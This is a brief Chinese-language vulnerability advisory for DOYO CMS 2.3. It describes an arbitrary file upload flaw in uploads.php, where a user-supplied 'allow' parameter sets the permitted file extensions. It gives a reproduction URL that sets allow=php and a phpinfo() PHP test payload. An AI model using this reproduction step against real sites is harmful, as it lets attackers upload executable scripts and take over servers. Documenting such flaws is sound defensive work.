漏洞描述

DOYO 2.3 可用于上传任何类型的文件漏洞
 
 

影响版本

DOYO 2.3
 
 

漏洞分析

在uploads.php
第一行接收参数allow,在syUpload对象实例化时传入,而syupload对象构造时,传入的allow直接作为允许的后缀字典 所以我们上传的时候只需要添加允许参数以上传任何后缀的文件




 
 

漏洞复现

/admin.php?c=uploads&tid=&isfiles=editor_KindEditor&dir=image&allow=php

<?php phpinfo();?>